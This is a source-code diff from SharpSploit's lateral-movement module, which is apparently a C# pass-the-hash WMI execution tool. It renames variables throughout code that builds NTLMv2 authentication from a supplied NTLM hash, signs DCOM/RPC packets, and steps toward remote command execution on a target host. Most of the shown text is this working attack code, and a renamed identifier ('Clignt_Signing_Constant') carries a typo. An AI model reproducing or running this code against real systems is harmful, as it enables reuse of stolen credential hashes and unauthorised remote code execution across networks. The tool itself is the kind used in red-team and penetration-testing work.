-                            OXID_bytes_index = OXID_index / 2;
-                            object_UUID = Utilities.GetByteRange(WMI_client_receive, OXID_bytes_index + 12, OXID_bytes_index + 27);
+                            OXID_Index = Reverse.IndexOf(OXID, Reverse_Index + 100);
+                            OXID_Bytes_Index = OXID_Index / 2;
+                            Object_UUID = Utilities.GetByteRange(WMI_Client_Receive, OXID_Bytes_Index + 12, OXID_Bytes_Index + 27);
                         }
-                        if (WMI_random_port_int != 0)
+                        if (WMI_Random_Port_Int != 0)
                         {
                             try
                             {
-                                WMI_client_random_port.Connect(target_long, WMI_random_port_int);
+                                WMI_Client_Random_Port.Connect(Target_Long, WMI_Random_Port_Int);
                             }
                             catch
                             {
-                                output.AppendLine(String.Format("{0}:{1} did not respond", target_long, WMI_random_port_int));
+                                output.AppendLine(String.Format("{0}:{1} did not respond", Target_Long, WMI_Random_Port_Int));
                                 return output.ToString();
                             }
                         }
@@ -419,148 +411,146 @@ namespace SharpSploit.LateralMovement
                         return output.ToString();
                     }
 
-                    if (WMI_client_random_port.Connected)
+                    if (WMI_Client_Random_Port.Connected)
                     {
-                        if (debug) { output.AppendLine(String.Format("Connected to: {0} using port {1}", target_long, WMI_random_port_int)); }
-                        NetworkStream WMI_client_random_port_stream = WMI_client_random_port.GetStream();
-                        packet_RPC = WMIExec.RPCBind(2, new byte[] { 0xd0, 0x16 }, new byte[] { 0x03 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }, new byte[] { 0x00, 0x00 });
-                        packet_RPC["RPCBind_FragLength"] = new byte[] { 0xd0, 0x00 };
-                        packet_RPC["RPCBind_AuthLength"] = new byte[] { 0x28, 0x00 };
-                        packet_RPC["RPCBind_NegotiateFlags"] = new byte[] { 0x97, 0x82, 0x08, 0xa2 };
-                        WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC);
-                        WMI_client_receive = SendStream(WMI_client_random_port_stream, WMI_client_send);
-                        assoc_group = Utilities.GetByteRange(WMI_client_receive, 20, 23);
-                        WMI_NTLMSSP = BitConverter.ToString(WMI_client_receive).Replace("-", "");
+                        if (debug) { output.AppendLine(String.Format("Connected to: {0} using port {1}", Target_Long, WMI_Random_Port_Int)); }
+                        NetworkStream WMI_Client_Random_Port_Stream = WMI_Client_Random_Port.GetStream();
+                        Packet_RPC = WMIExec.RPCBind(2, new byte[] { 0xd0, 0x16 }, new byte[] { 0x03 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }, new byte[] { 0x00, 0x00 });
+                        Packet_RPC["RPCBind_FragLength"] = new byte[] { 0xd0, 0x00 };
+                        Packet_RPC["RPCBind_AuthLength"] = new byte[] { 0x28, 0x00 };
+                        Packet_RPC["RPCBind_NegotiateFlags"] = new byte[] { 0x97, 0x82, 0x08, 0xa2 };
+                        WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC);
+                        WMI_Client_Receive = SendStream(WMI_Client_Random_Port_Stream, WMI_Client_Send);
+                        Assoc_Group = Utilities.GetByteRange(WMI_Client_Receive, 20, 23);
+                        WMI_NTLMSSP = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
                         WMI_NTLMSSP_index = WMI_NTLMSSP.IndexOf("4E544C4D53535000");
                         WMI_NTLMSSP_bytes_index = WMI_NTLMSSP_index / 2;
-                        WMI_domain_length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 12, WMI_client_receive);
-                        WMI_target_length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 40, WMI_client_receive);
-                        WMI_session_ID = Utilities.GetByteRange(WMI_client_receive, 44, 51);
-                        WMI_NTLM_challenge = Utilities.GetByteRange(WMI_client_receive, WMI_NTLMSSP_bytes_index + 24, WMI_NTLMSSP_bytes_index + 31);
-                        WMI_target_details = Utilities.GetByteRange(WMI_client_receive, WMI_NTLMSSP_bytes_index + 56 + WMI_domain_length, WMI_NTLMSSP_bytes_index + 55 + WMI_domain_length + WMI_target_length);
-                        WMI_target_time_bytes = Utilities.GetByteRange(WMI_target_details, WMI_target_details.Length - 12, WMI_target_details.Length - 5);
+                        WMI_Domain_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 12, WMI_Client_Receive);
+                        WMI_target_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 40, WMI_Client_Receive);
+                        WMI_NTLM_Challenge = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 24, WMI_NTLMSSP_bytes_index + 31);
+                        WMI_Target_Details = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 56 + WMI_Domain_Length, WMI_NTLMSSP_bytes_index + 55 + WMI_Domain_Length + WMI_target_Length);
+                        WMI_Target_Time_Bytes = Utilities.GetByteRange(WMI_Target_Details, WMI_Target_Details.Length - 12, WMI_Target_Details.Length - 5);
                         sb = new StringBuilder();
                         for (int i = 0; i < hash.Length - 1; i += 2) { sb.Append(hash.Substring(i, 2) + "-"); };
                         NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
-                        hash_string_array = sb.ToString().Split('-');
-                        auth_hostname = Environment.MachineName;
-                        auth_hostname_bytes = Encoding.Unicode.GetBytes(auth_hostname);
-                        auth_domain_bytes = Encoding.Unicode.GetBytes(domain);
-                        auth_username_bytes = Encoding.Unicode.GetBytes(username);
-                        auth_domain_length = BitConverter.GetBytes(auth_domain_bytes.Length);
-                        auth_domain_length = new byte[] { auth_domain_length[0], auth_domain_length[1] };
-                        auth_username_length = BitConverter.GetBytes(auth_username_bytes.Length);
-                        auth_username_length = new byte[] { auth_username_length[0], auth_username_length[1] };
-                        auth_hostname_length = BitConverter.GetBytes(auth_hostname_bytes.Length);
-                        auth_hostname_length = new byte[] { auth_hostname_length[0], auth_hostname_length[1] };
-                        auth_domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
-                        auth_username_offset = BitConverter.GetBytes(auth_domain_bytes.Length + 64);
-                        auth_hostname_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + 64);
-                        auth_LM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 64);
-                        auth_NTLM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 88);
+                        Auth_Hostname = Environment.MachineName;
+                        Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname);
+                        Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain);
+                        Auth_Username_Bytes = Encoding.Unicode.GetBytes(username);
+                        Auth_Domain_Length = BitConverter.GetBytes(Auth_Domain_Bytes.Length);
+                        Auth_Domain_Length = new byte[] { Auth_Domain_Length[0], Auth_Domain_Length[1] };
+                        Auth_Username_Length = BitConverter.GetBytes(Auth_Username_Bytes.Length);
+                        Auth_Username_Length = new byte[] { Auth_Username_Length[0], Auth_Username_Length[1] };
+                        Auth_Hostname_Length = BitConverter.GetBytes(Auth_Hostname_Bytes.Length);
+                        Auth_Hostname_Length = new byte[] { Auth_Hostname_Length[0], Auth_Hostname_Length[1] };
+                        Auth_Domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
+                        Auth_Username_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + 64);
+                        Auth_Hostname_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + 64);
+                        Auth_LM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 64);
+                        Auth_NTLM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 88);
                         HMAC_MD5 = new HMACMD5();
                         HMAC_MD5.Key = NTLM_hash_bytes;
-                        username_and_target = username.ToUpper();
-                        username_bytes = Encoding.Unicode.GetBytes(username_and_target);
-                        username_and_target_bytes = username_bytes.Concat(auth_domain_bytes).ToArray();
-                        NTLMv2_hash = HMAC_MD5.ComputeHash(username_and_target_bytes);
+                        Username_And_Target = username.ToUpper();
+                        Username_Bytes = Encoding.Unicode.GetBytes(Username_And_Target);
+                        Username_And_Target_bytes = Username_Bytes.Concat(Auth_Domain_Bytes).ToArray();
+                        NTLMv2_hash = HMAC_MD5.ComputeHash(Username_And_Target_bytes);
                         r = new Random();
-                        client_challenge_bytes = new byte[8];
-                        r.NextBytes(client_challenge_bytes);
+                        Client_Challenge_Bytes = new byte[8];
+                        r.NextBytes(Client_Challenge_Bytes);
                         
-                        security_blob_bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                        .Concat(WMI_target_time_bytes)
-                        .Concat(client_challenge_bytes)
+                        Security_Blob_Bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                        .Concat(WMI_Target_Time_Bytes)
+                        .Concat(Client_Challenge_Bytes)
                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
-                        .Concat(WMI_target_details)
+                        .Concat(WMI_Target_Details)
                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
 
-                        server_challenge_and_security_blob_bytes = WMI_NTLM_challenge.Concat(security_blob_bytes).ToArray();
+                        Server_Challenge_And_Security_Blob_Bytes = WMI_NTLM_Challenge.Concat(Security_Blob_Bytes).ToArray();
                         HMAC_MD5.Key = NTLMv2_hash;
-                        NTLMv2_response = HMAC_MD5.ComputeHash(server_challenge_and_security_blob_bytes);
-                        session_base_key = HMAC_MD5.ComputeHash(NTLMv2_response);
-                        byte[] client_signing_constant = new byte[] { 0x73, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x74, 0x6f, 0x20, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x2d, 0x74, 0x6f, 0x2d, 0x73, 0x65, 0x72, 0x76, 0x65, 0x72, 0x20, 0x73, 0x69, 0x67, 0x6e, 0x69, 0x6e, 0x67, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x6d, 0x61, 0x67, 0x69, 0x63, 0x20, 0x63, 0x6f, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x74, 0x00 };
+                        NTLMv2_Response = HMAC_MD5.ComputeHash(Server_Challenge_And_Security_Blob_Bytes);
+                        Session_Base_Key = HMAC_MD5.ComputeHash(NTLMv2_Response);
+                        byte[] Clignt_Signing_Constant = new byte[] { 0x73, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x74, 0x6f, 0x20, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x2d, 0x74, 0x6f, 0x2d, 0x73, 0x65, 0x72, 0x76, 0x65, 0x72, 0x20, 0x73, 0x69, 0x67, 0x6e, 0x69, 0x6e, 0x67, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x6d, 0x61, 0x67, 0x69, 0x63, 0x20, 0x63, 0x6f, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x74, 0x00 };
                         MD5CryptoServiceProvider MD5_crypto = new MD5CryptoServiceProvider();
-                        byte[] client_signing_key = MD5_crypto.ComputeHash(session_base_key.Concat(client_signing_constant).ToArray());
-                        NTLMv2_response = NTLMv2_response.Concat(security_blob_bytes).ToArray();
-                        NTLMv2_response_length = BitConverter.GetBytes(NTLMv2_response.Length);
-                        NTLMv2_response_length = new byte[] { NTLMv2_response_length[0], NTLMv2_response_length[1] };
-                        WMI_session_key_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + NTLMv2_response.Length + 88);
-                        WMI_session_key_length = new byte[] { 0x00, 0x00 };
-                        WMI_negotiate_flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 };
+                        byte[] Client_Signing_Key = MD5_crypto.ComputeHash(Session_Base_Key.Concat(Clignt_Signing_Constant).ToArray());
+                        NTLMv2_Response = NTLMv2_Response.Concat(Security_Blob_Bytes).ToArray();
+                        NTLMv2_Response_Length = BitConverter.GetBytes(NTLMv2_Response.Length);
+                        NTLMv2_Response_Length = new byte[] { NTLMv2_Response_Length[0], NTLMv2_Response_Length[1] };
+                        WMI_Session_Key_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + NTLMv2_Response.Length + 88);
+                        WMI_Session_Key_Length = new byte[] { 0x00, 0x00 };
+                        WMI_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 };
                         NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
-                            .Concat(auth_LM_offset)
-                            .Concat(NTLMv2_response_length)
-                            .Concat(NTLMv2_response_length)
-                            .Concat(auth_NTLM_offset)
-                            .Concat(auth_domain_length)
-                            .Concat(auth_domain_length)
-                            .Concat(auth_domain_offset)
-                            .Concat(auth_username_length)
-                            .Concat(auth_username_length)
-                            .Concat(auth_username_offset)
-                            .Concat(auth_hostname_length)
-                            .Concat(auth_hostname_length)
-                            .Concat(auth_hostname_offset)
-                            .Concat(WMI_session_key_length)
-                            .Concat(WMI_session_key_length)
-                            .Concat(WMI_session_key_offset)
-                            .Concat(WMI_negotiate_flags)
-                            .Concat(auth_domain_bytes)
-                            .Concat(auth_username_bytes)
-                            .Concat(auth_hostname_bytes)
+                            .Concat(Auth_LM_Offset)
+                            .Concat(NTLMv2_Response_Length)
+                            .Concat(NTLMv2_Response_Length)
+                            .Concat(Auth_NTLM_Offset)
+                            .Concat(Auth_Domain_Length)
+                            .Concat(Auth_Domain_Length)
+                            .Concat(Auth_Domain_offset)
+                            .Concat(Auth_Username_Length)
+                            .Concat(Auth_Username_Length)
+                            .Concat(Auth_Username_Offset)
+                            .Concat(Auth_Hostname_Length)
+                            .Concat(Auth_Hostname_Length)
+                            .Concat(Auth_Hostname_Offset)
+                            .Concat(WMI_Session_Key_Length)
+                            .Concat(WMI_Session_Key_Length)
+                            .Concat(WMI_Session_Key_Offset)
+                            .Concat(WMI_Negotiate_Flags)
+                            .Concat(Auth_Domain_Bytes)
+                            .Concat(Auth_Username_Bytes)
+                            .Concat(Auth_Hostname_Bytes)
                             .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                            .Concat(NTLMv2_response).ToArray();
+                            .Concat(NTLMv2_Response).ToArray();
 
-                        HMAC_MD5.Key = client_signing_key;
-                        sequence_number = new byte[] { 0x00, 0x00, 0x00, 0x00 };
-                        packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response);
-                        packet_RPC["RPCAUTH3_CallID"] = new byte[] { 0x02, 0x00, 0x00, 0x00 };
-                        packet_RPC["RPCAUTH3_AuthLevel"] = new byte[] { 0x04 };
-                        WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC);
-                        WMI_client_random_port_stream.Write(WMI_client_send, 0, WMI_client_send.Length);
-                        WMI_client_random_port_stream.Flush();
-                        packet_RPC = WMIExec.RPCRequest(new byte[] { 0x83 }, 76, 16, 4, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x03, 0x00 }, object_UUID);
-                        OrderedDictionary packet_rem_query_interface = WMIExec.DCOMRemQueryInterface(causality_ID_bytes, IPID, new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 });
-                        OrderedDictionary packet_NTLMSSP_verifier = WMIExec.NTLMSSPVerifier(4, new byte[] { 0x04 }, sequence_number);
-                        byte[] rem_query_interface = Utilities.ConvertFromPacketOrderedDictionary(packet_rem_query_interface);
-                        byte[] NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
-                        HMAC_MD5.Key = client_signing_key;
-                        byte[] RPC_Sign = sequence_number.Concat(Utilities.ConvertFromPacketOrderedDictionary(packet_RPC))
-                            .Concat(rem_query_interface)
-                            .Concat(Utilities.GetByteRange(NTLMSSP_verifier, 0, 11)).ToArray();
+                        HMAC_MD5.Key = Client_Signing_Key;
+                        Sequence_Number = new byte[] { 0x00, 0x00, 0x00, 0x00 };
+                        Packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response);
+                        Packet_RPC["RPCAUTH3_CallID"] = new byte[] { 0x02, 0x00, 0x00, 0x00 };
+                        Packet_RPC["RPCAUTH3_AuthLevel"] = new byte[] { 0x04 };
+                        WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC);
+                        WMI_Client_Random_Port_Stream.Write(WMI_Client_Send, 0, WMI_Client_Send.Length);
+                        WMI_Client_Random_Port_Stream.Flush();
                         
-                        byte[] RPC_signature = HMAC_MD5.ComputeHash(RPC_Sign);
-                        RPC_signature = Utilities.GetByteRange(RPC_signature, 0, 7);
-                        packet_NTLMSSP_verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_signature;
-                        NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
+                        Packet_RPC = WMIExec.RPCRequest(new byte[] { 0x83 }, 76, 16, 4, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x03, 0x00 }, Object_UUID);
+                        OrderedDictionary Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID, new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 });
+                        OrderedDictionary Packet_NTLMSSP_Verifier = WMIExec.NTLMSSPVerifier(4, new byte[] { 0x04 }, Sequence_Number);
+                        byte[] Rem_Query_Interface = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface);
+                        byte[] NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier);
+                        HMAC_MD5.Key = Client_Signing_Key;
+                        byte[] RPC_Sign = Sequence_Number.Concat(Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC))
+                            .Concat(Rem_Query_Interface)
+                            .Concat(Utilities.GetByteRange(NTLMSSP_Verifier, 0, 11)).ToArray();
+                        
+                        byte[] RPC_Signature = HMAC_MD5.ComputeHash(RPC_Sign);
+                        RPC_Signature = Utilities.GetByteRange(RPC_Signature, 0, 7);
+                        Packet_NTLMSSP_Verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_Signature;
+                        NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier);
 
-                        WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC)
-                            .Concat(rem_query_interface)
-                            .Concat(NTLMSSP_verifier).ToArray();
+                        WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC)
+                            .Concat(Rem_Query_Interface)
+                            .Concat(NTLMSSP_Verifier).ToArray();
 
-                        WMI_client_receive = SendStream(WMI_client_random_port_stream, WMI_client_send);
-                        WMI_client_stage = "exit";
+                        WMI_Client_Receive = SendStream(WMI_Client_Random_Port_Stream, WMI_Client_Send);
 
-                        if (WMI_client_receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_client_receive, 24, 27)) == "05-00-00-00")
+                        if (WMI_Client_Receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 24, 27)) == "05-00-00-00")
                         {
-                            output.AppendLine(String.Format("{0} WMI access denied on {1}", output_username, target_long));
+                            output.AppendLine(String.Format("{0} WMI access denied on {1}", Output_Username, Target_Long));
                             return output.ToString();
                         }
-                        else if (WMI_client_receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_client_receive, 24, 27)) != "05-00-00-00")
+                        else if (WMI_Client_Receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 24, 27)) != "05-00-00-00")
                         {
-                            string error_code = BitConverter.ToString(new byte[] { WMI_client_receive[27], WMI_client_receive[26], WMI_client_receive[25], WMI_client_receive[24] });
-                            string[] error_code_array = error_code.Split('-');
-                            error_code = string.Join("", error_code_array);
-                            output.AppendLine(String.Format("Error Code: 0x{0}", error_code.ToString()));
+                            string Error_Code = BitConverter.ToString(new byte[] { WMI_Client_Receive[27], WMI_Client_Receive[26], WMI_Client_Receive[25], WMI_Client_Receive[24] });
+                            string[] Error_Code_Array = Error_Code.Split('-');
+                            Error_Code = string.Join("", Error_Code_Array);
+                            output.AppendLine(String.Format("Error Code: 0x{0}", Error_Code.ToString()));
                             return output.ToString();
                         }
-                        else if (WMI_client_receive[2] == 2)
+                        else if (WMI_Client_Receive[2] == 2)
                         {
-                            WMI_data = BitConverter.ToString(WMI_client_receive).Replace("-", "");
-                            OXID_index = WMI_data.IndexOf(OXID);
-                            OXID_bytes_index = OXID_index / 2;
-                            object_UUID2 = Utilities.GetByteRange(WMI_client_receive, OXID_bytes_index + 16, OXID_bytes_index + 31);
+                            WMI_Data = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
+                            OXID_Index = WMI_Data.IndexOf(OXID);
+                            OXID_Bytes_Index = OXID_Index / 2;
+                            Object_UUID2 = Utilities.GetByteRange(WMI_Client_Receive, OXID_Bytes_Index + 16, OXID_Bytes_Index + 31);
                             WMI_client_stage = "AlterContext";
                         }
                         else
@@ -570,19 +560,19 @@ namespace SharpSploit.LateralMovement
                         }
 
                         //Moving on to Command Execution
-                        int request_split_index = 5500;
+                        int Request_Split_Index = 5500;
                         string WMI_client_stage_next = "";
-                        bool request_split = false;
+                        bool Request_Split = false;
 
                         while (WMI_client_stage != "exit")
                         {
                             if (debug) { output.AppendLine(WMI_client_stage); }
-                            if (WMI_client_receive[2] == 3)
+                            if (WMI_Client_Receive[2] == 3)
                             {
-                                string error_code = BitConverter.ToString(new byte[] { WMI_client_receive[27], WMI_client_receive[26], WMI_client_receive[25], WMI_client_receive[24] });
-                                string[] error_code_array = error_code.Split('-');
-                                error_code = string.Join("", error_code_array);
-                                output.AppendLine(String.Format("Execution failed with error code: 0x{0}", error_code.ToString()));
+                                string Error_Code = BitConverter.ToString(new byte[] { WMI_Client_Receive[27], WMI_Client_Receive[26], WMI_Client_Receive[25], WMI_Client_Receive[24] });
+                                string[] Error_Code_Array = Error_Code.Split('-');
+                                Error_Code = string.Join("", Error_Code_Array);
+                                output.AppendLine(String.Format("Execution failed with error code: 0x{0}", Error_Code.ToString()));
                                 WMI_client_stage = "exit";
                             }
 
@@ -590,296 +580,295 @@ namespace SharpSploit.LateralMovement
                             {
                                 case "AlterContext":
                                     {
-                                        switch (sequence_number[0])
+                                        switch (Sequence_Number[0])
                                         {
                                             case 0:
                                                 {
-                                                    alter_context_call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 };
-                                                    alter_context_context_ID = new byte[] { 0x02, 0x00 };
-                                                    alter_context_UUID = new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 };
+                                                    Alter_Context_Call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 };
+                                                    Alter_Context_Context_ID = new byte[] { 0x02, 0x00 };
+                                                    Alter_Context_UUID = new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 };
                                                     WMI_client_stage_next = "Request";
                                                 }
                                                 break;
                                             case 1:
                                                 {
-                                                    alter_context_call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 };
-                                                    alter_context_context_ID = new byte[] { 0x03, 0x00 };
-                                                    alter_context_UUID = new byte[] { 0x18, 0xad, 0x09, 0xf3, 0x6a, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 };
+                                                    Alter_Context_Call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 };
+                                                    Alter_Context_Context_ID = new byte[] { 0x03, 0x00 };
+                                                    Alter_Context_UUID = new byte[] { 0x18, 0xad, 0x09, 0xf3, 0x6a, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 };
                                                     WMI_client_stage_next = "Request";
                                                 }
                                                 break;
                                             case 6:
                                                 {
-                                                    alter_context_call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 };
-                                                    alter_context_context_ID = new byte[] { 0x04, 0x00 };
-                                                    alter_context_UUID = new byte[] { 0x99, 0xdc, 0x56, 0x95, 0x8c, 0x82, 0xcf, 0x11, 0xa3, 0x7e, 0x00, 0xaa, 0x00, 0x32, 0x40, 0xc7 };
+                                                    Alter_Context_Call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 };
+                                                    Alter_Context_Context_ID = new byte[] { 0x04, 0x00 };
+                                                    Alter_Context_UUID = new byte[] { 0x99, 0xdc, 0x56, 0x95, 0x8c, 0x82, 0xcf, 0x11, 0xa3, 0x7e, 0x00, 0xaa, 0x00, 0x32, 0x40, 0xc7 };
                                                     WMI_client_stage_next = "Request";
                                                 }
                                                 break;
                                         }
-                                        packet_RPC = WMIExec.RPCAlterContext(assoc_group, alter_context_call_ID, alter_context_context_ID, alter_context_UUID);
-                                        WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC);
-                                        WMI_client_receive = SendStream(WMI_client_random_port_stream, WMI_client_send);
+                                        Packet_RPC = WMIExec.RPCAlterContext(Assoc_Group, Alter_Context_Call_ID, Alter_Context_Context_ID, Alter_Context_UUID);
+                                        WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC);
+                                        WMI_Client_Receive = SendStream(WMI_Client_Random_Port_Stream, WMI_Client_Send);
                                         WMI_client_stage = WMI_client_stage_next;
                                     }
                                     break;
                                 case "Request":
                                     {
-                                        switch (sequence_number[0])
+                                        switch (Sequence_Number[0])
                                         {
                                             case 0:
                                                 {
-                                                    sequence_number = new byte[] { 0x01, 0x00, 0x00, 0x00 };
-                                                    request_flags = new byte[] { 0x83 };
-                                                    request_auth_padding = 12;
-                                                    request_call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 };
-                                                    request_context_ID = new byte[] { 0x02, 0x00 };
-                                                    request_opnum = new byte[] { 0x03, 0x00 };
-                                                    request_UUID = object_UUID2;
-                                                    hostname_length = BitConverter.GetBytes(auth_hostname.Length + 1);
+                                                    Sequence_Number = new byte[] { 0x01, 0x00, 0x00, 0x00 };
+                                                    Request_Flags = new byte[] { 0x83 };
+                                                    Request_Auth_Padding = 12;
+                                                    Request_Call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 };
+                                                    Request_Context_ID = new byte[] { 0x02, 0x00 };
+                                                    Request_Opnum = new byte[] { 0x03, 0x00 };
+                                                    Request_UUID = Object_UUID2;
+                                                    Hostname_Length = BitConverter.GetBytes(Auth_Hostname.Length + 1);
                                                     WMI_client_stage_next = "AlterContext";
 
-                                                    if (Convert.ToBoolean(auth_hostname.Length % 2))
+                                                    if (Convert.ToBoolean(Auth_Hostname.Length % 2))
                                                     {
-                                                        auth_hostname_bytes = auth_hostname_bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
+                                                        Auth_Hostname_Bytes = Auth_Hostname_Bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
                                                     }
                                                     else
                                                     {
-                                                        auth_hostname_bytes = auth_hostname_bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                                        Auth_Hostname_Bytes = Auth_Hostname_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                     }
 
-                                                    stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                                                        .Concat(causality_ID_bytes)
+                                                    Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(Causality_ID_Bytes)
                                                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 })
-                                                        .Concat(hostname_length)
+                                                        .Concat(Hostname_Length)
                                                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
-                                                        .Concat(hostname_length)
-                                                        .Concat(auth_hostname_bytes)
-                                                        .Concat(process_ID_Bytes)
+                                                        .Concat(Hostname_Length)
+                                                        .Concat(Auth_Hostname_Bytes)
+                                                        .Concat(Process_ID_Bytes)
                                                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                 }
